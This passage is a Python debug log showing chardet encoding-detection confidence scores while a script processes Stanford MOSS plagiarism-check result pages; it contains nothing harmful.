0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.544320562855735\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match186-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match186-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match186-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 14512\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 14499\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 14512\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5375114513393936\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 
0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS 
not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40407\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match207-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match207-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match207-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match203-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match203-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match203-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match209-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match209-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match209-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21276\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20102\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 
0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20089\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21277\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5667740239305642\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20102\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20089\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20089\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20090\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 
0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20089\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5516082579026649\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match205-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match205-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match205-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match208-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match208-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match208-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match204-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match204-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match204-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16159\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match206-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match206-0.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match206-1.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16159\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19390\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16159\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16160\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19377\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16159\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19390\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19377\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5391977486644284\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match210-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19377\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19378\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19377\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17082\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17069\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 
0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17082\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.537539049067621\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17069\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match210-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match210-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match211-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match211-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match211-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match212-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17069\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17070\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17069\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5289270374829899\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not 
active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match212-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match212-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 18750\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16122\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24120\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 18737\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16109\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 18750\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24107\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16122\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16109\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 18737\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24120\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 18737\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24107\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16109\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 18738\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5667878181900473\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24107\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16110\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 18737\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24108\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16109\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 
0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24107\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5456726203364073\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match213-0.html\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 